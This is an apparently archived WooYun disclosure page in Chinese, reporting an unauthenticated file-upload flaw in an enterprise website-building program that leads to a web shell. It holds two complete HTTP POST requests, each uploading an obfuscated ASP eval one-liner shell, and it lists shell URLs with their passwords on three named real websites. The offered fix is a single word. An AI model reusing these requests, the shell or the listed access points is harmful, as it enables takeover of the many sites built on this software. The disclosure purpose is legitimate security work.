某企业建站程序通用上传漏洞无需登录直接getshell | wooyun-2015-089352

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-089352

漏洞标题：

某企业建站程序通用上传漏洞无需登录直接getshell

漏洞详情

披露状态：

2015-01-04：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-04-04：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

某企业建站程序通用上传漏洞无需登录直接getshell

详细说明：

某企业建站程序通用上传漏洞无需登录直接getshell
http://www.ynhl.net一诺互联是一家规模挺大的企业建站公司案例有上万家网站(所以该漏洞是影响极大的)
更多案例请参考：http://www.ynhl.net/case/

漏洞证明：

问题出在网站程序上的一个上传更多案例请参考：http://www.ynhl.net/case/
下面拿官网演示http://www.ynhl.net
漏洞地址：http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
上传过滤不全导致任意上传文件前提是主要把目标站加入可信站点才能上传文件

然后上传文件使用burp抓包
http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
修改该处图片类型为asp

附数据包：

POST /admin/fupaction.asp HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de2902b3015a
Accept-Encoding: gzip, deflate
Host: www.ynhl.net
Content-Length: 828
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDSCRQDTRR=BJCDJKGDHMFDAAKLGFHONOKE; bdshare_firstime=1419171865847; ASPSESSIONIDAASQCRST=MOGFKEJDPIKEBEFGJPCEFHPL; ASPSESSIONIDCARRCTTS=GAJPMOLDEIDBNGOCLGJECFPC; CNZZDATA5076377=cnzz_eid%3D1944653864-1419168501-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1419215083
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="upfile"; filename="C:\Documents and Settings\Administrator\×ÀÃæ\asp.asp"
Content-Type: text/plain
1<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="Submit"
¿ªÊ¼ÉÏ´«
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="useForm"
form1
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="upUrl"
tp
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="prevImg"
showImg
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="reItem"
rePic
-----------------------------7de2902b3015a--

如上图已经看到上传成功了 http://www.ynhl.net/admin/tp/asp0.asp 密码-7
http://www.bohome.cn/admin/tp/1111.asp 密码cai

http://www.lubeian.com.cn/tp/1111.asp 密码-7

POST /fupaction.asp HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.lubeian.com.cn/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de3d83a290590
Accept-Encoding: gzip, deflate
Host: www.lubeian.com.cn
Content-Length: 835
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDASTQBBAB=CPIBHBABLCDPDAFFBEJKMOJE
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="upfile"; filename="C:\Documents and Settings\Administrator\×ÀÃæ\1111.asp"
Content-Type: text/plain
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="Submit"
¿ªÊ¼ÉÏ´«
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="useForm"
form1
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="upUrl"
tp
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="prevImg"
showImg
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="reItem"
rePic
-----------------------------7de3d83a290590--

更多案例请参考：http://www.ynhl.net/case/

修复方案：

过滤

版权声明：转载请注明来源 Ch丶0nly@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞